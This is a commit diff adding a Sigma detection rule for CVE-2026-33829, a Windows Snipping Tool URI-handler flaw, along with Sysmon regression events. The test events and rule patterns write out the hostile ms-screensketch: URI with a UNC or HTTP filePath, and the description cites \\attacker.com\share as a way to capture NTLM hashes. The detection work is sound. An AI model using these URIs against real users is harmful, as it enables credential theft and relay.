Merge PR #5942 from @swachchhanda000 - Add Potential CVE-2026-33829 Exploitation - Windows Snipping Tool Remote File Path URI

new: Potential CVE-2026-33829 Exploitation - Windows Snipping Tool Remote File Path URI

---------

Co-authored-by: Nasreddine Bencherchali <monsteroffire2@gmail.com>

regression_data/rules-emerging-threats/2026/Exploits/CVE-2026-33829/proc_creation_win_exploit_cve_2026_33829/7c3a5b1d-9e2f-4a8c-b5d7-1e0f3c6a9b2d.json

@@ -0,0 +1,132 @@
+{
+  "Event": {
+    "#attributes": {
+      "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+    },
+    "System": {
+      "Provider": {
+        "#attributes": {
+          "Name": "Microsoft-Windows-Sysmon",
+          "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+        }
+      },
+      "EventID": 1,
+      "Version": 5,
+      "Level": 4,
+      "Task": 1,
+      "Opcode": 0,
+      "Keywords": "0x8000000000000000",
+      "TimeCreated": {
+        "#attributes": {
+          "SystemTime": "2026-04-20T10:00:35.646624Z"
+        }
+      },
+      "EventRecordID": 86918,
+      "Correlation": null,
+      "Execution": {
+        "#attributes": {
+          "ProcessID": 3208,
+          "ThreadID": 1724
+        }
+      },
+      "Channel": "Microsoft-Windows-Sysmon/Operational",
+      "Computer": "swachchhanda",
+      "Security": {
+        "#attributes": {
+          "UserID": "S-1-5-18"
+        }
+      }
+    },
+    "EventData": {
+      "RuleName": "-",
+      "UtcTime": "2026-04-20 10:00:35.640",
+      "ProcessGuid": "0197231E-F943-69E5-A527-000000000800",
+      "ProcessId": 6180,
+      "Image": "C:\\Program Files\\WindowsApps\\Microsoft.ScreenSketch_11.2601.12.0_arm64__8wekyb3d8bbwe\\SnippingTool\\SnippingTool.exe",
+      "FileVersion": "-",
+      "Description": "-",
+      "Product": "-",
+      "Company": "-",
+      "OriginalFileName": "-",
+      "CommandLine": "\"C:\\Program Files\\WindowsApps\\Microsoft.ScreenSketch_11.2601.12.0_arm64__8wekyb3d8bbwe\\SnippingTool\\SnippingTool.exe\" ms-screensketch:edit?&filePath=%%5C%%5C172.16.137.159%%5Cshare",
+      "CurrentDirectory": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\147.0.3912.72\\",
+      "User": "swachchhanda\\xodih",
+      "LogonGuid": "0197231E-7F52-69E4-50D1-E83300000000",
+      "LogonId": "0x33e8d150",
+      "TerminalSessionId": 2,
+      "IntegrityLevel": "Medium",
+      "Hashes": "MD5=FF9D1ED3795B9AD94F2390D5E5DA5905,SHA256=A80CB394D251F781DBD5FFB889D38FDD2095ADE63110578CA62F62CF795B7538,IMPHASH=3D4392A18BB23C56D311A2D64B6E5BA0",
+      "ParentProcessGuid": "0197231E-8126-69E4-8326-000000000800",
+      "ParentProcessId": 6428,
+      "ParentImage": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe",
+      "ParentCommandLine": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window",
+      "ParentUser": "swachchhanda\\xodih"
+    }
+  }
+}
+{
+  "Event": {
+    "#attributes": {
+      "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+    },
+    "System": {
+      "Provider": {
+        "#attributes": {
+          "Name": "Microsoft-Windows-Sysmon",
+          "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+        }
+      },
+      "EventID": 1,
+      "Version": 5,
+      "Level": 4,
+      "Task": 1,
+      "Opcode": 0,
+      "Keywords": "0x8000000000000000",
+      "TimeCreated": {
+        "#attributes": {
+          "SystemTime": "2026-04-20T10:00:40.222623Z"
+        }
+      },
+      "EventRecordID": 86921,
+      "Correlation": null,
+      "Execution": {
+        "#attributes": {
+          "ProcessID": 3208,
+          "ThreadID": 1724
+        }
+      },
+      "Channel": "Microsoft-Windows-Sysmon/Operational",
+      "Computer": "swachchhanda",
+      "Security": {
+        "#attributes": {
+          "UserID": "S-1-5-18"
+        }
+      }
+    },
+    "EventData": {
+      "RuleName": "-",
+      "UtcTime": "2026-04-20 10:00:40.217",
+      "ProcessGuid": "0197231E-F948-69E5-A727-000000000800",
+      "ProcessId": 16492,
+      "Image": "C:\\Program Files\\WindowsApps\\Microsoft.ScreenSketch_11.2601.12.0_arm64__8wekyb3d8bbwe\\SnippingTool\\SnippingTool.exe",
+      "FileVersion": "-",
+      "Description": "-",
+      "Product": "-",
+      "Company": "-",
+      "OriginalFileName": "-",
+      "CommandLine": "\"C:\\Program Files\\WindowsApps\\Microsoft.ScreenSketch_11.2601.12.0_arm64__8wekyb3d8bbwe\\SnippingTool\\SnippingTool.exe\" ms-screensketch:edit?&filePath=http://172.16.137.159:8000/file.png",
+      "CurrentDirectory": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\147.0.3912.72\\",
+      "User": "swachchhanda\\xodih",
+      "LogonGuid": "0197231E-7F52-69E4-50D1-E83300000000",
+      "LogonId": "0x33e8d150",
+      "TerminalSessionId": 2,
+      "IntegrityLevel": "Medium",
+      "Hashes": "MD5=FF9D1ED3795B9AD94F2390D5E5DA5905,SHA256=A80CB394D251F781DBD5FFB889D38FDD2095ADE63110578CA62F62CF795B7538,IMPHASH=3D4392A18BB23C56D311A2D64B6E5BA0",
+      "ParentProcessGuid": "0197231E-8126-69E4-8326-000000000800",
+      "ParentProcessId": 6428,
+      "ParentImage": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe",
+      "ParentCommandLine": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window",
+      "ParentUser": "swachchhanda\\xodih"
+    }
+  }
+}

regression_data/rules-emerging-threats/2026/Exploits/CVE-2026-33829/proc_creation_win_exploit_cve_2026_33829/info.yml

@@ -0,0 +1,13 @@
+id: baeec889-f3aa-4a10-b913-71e94f741066
+description: N/A
+date: 2026-04-20
+author: Swachchhanda Shrawan Poudel (Nextron Systems)
+rule_metadata:
+    - id: 7c3a5b1d-9e2f-4a8c-b5d7-1e0f3c6a9b2d
+      title: Potential CVE-2026-33829 Exploitation - Windows Snipping Tool Remote File Path URI
+regression_tests_info:
+    - name: Positive Detection Test
+      type: evtx
+      provider: Microsoft-Windows-Sysmon
+      match_count: 2
+      path: regression_data/rules-emerging-threats/2026/Exploits/CVE-2026-33829/proc_creation_win_exploit_cve_2026_33829/7c3a5b1d-9e2f-4a8c-b5d7-1e0f3c6a9b2d.evtx

rules-emerging-threats/2026/Exploits/CVE-2026-33829/proc_creation_win_exploit_cve_2026_33829.yml

@@ -0,0 +1,36 @@
+title: Potential CVE-2026-33829 Exploitation - Windows Snipping Tool Remote File Path URI
+id: 7c3a5b1d-9e2f-4a8c-b5d7-1e0f3c6a9b2d
+status: test
+description: |
+    Detects potential exploitation of CVE-2026-33829, a vulnerability in the Windows Snipping Tool URI handler (ms-screensketch:).
+    An attacker can abuse the 'filePath' parameter to supply a UNC path or HTTP URL, causing SnippingTool.exe to initiate a connection to a remote resource.
+    When a UNC path is used (e.g. \\attacker.com\share), this triggers an outbound NTLM authentication attempt, allowing the attacker to capture or relay the victim's Net-NTLMv2 hash.
+    HTTP-based paths may result in remote file loading or server-side request forgery (SSRF)-style access.
+    The URI can be delivered via a malicious hyperlink, phishing email, or web page.
+references:
+    - https://x.com/BlackArrowSec/status/2044374743491424508
+    - https://x.com/SBousseaden/status/2044417029721997635
+author: Samir Bousseaden, Swachchhanda Shrawan Poudel (Nextron Systems)
+date: 2026-04-28
+tags:
+    - attack.credential-access
+    - attack.t1187
+    - detection.emerging-threats
+    - cve.2026-33829
+logsource:
+    category: process_creation
+    product: windows
+detection:
+    selection:
+        Image|endswith: '\SnippingTool.exe'
+        CommandLine|contains:
+            # '\\\\'  = literal double backslash (UNC path start); '%5C' and '%%5C' are URL-encoded variations of the same backslash character
+            - 'ms-screensketch:edit?&filePath=\\\\'
+            - 'ms-screensketch:edit?&filePath=%%5C'
+            - 'ms-screensketch:edit?&filePath=%5C'
+            - 'ms-screensketch:edit?&filePath=http'
+    condition: selection
+falsepositives:
+    - Unknown
+level: high
+regression_tests_path: regression_data/rules-emerging-threats/2026/Exploits/CVE-2026-33829/proc_creation_win_exploit_cve_2026_33829/info.yml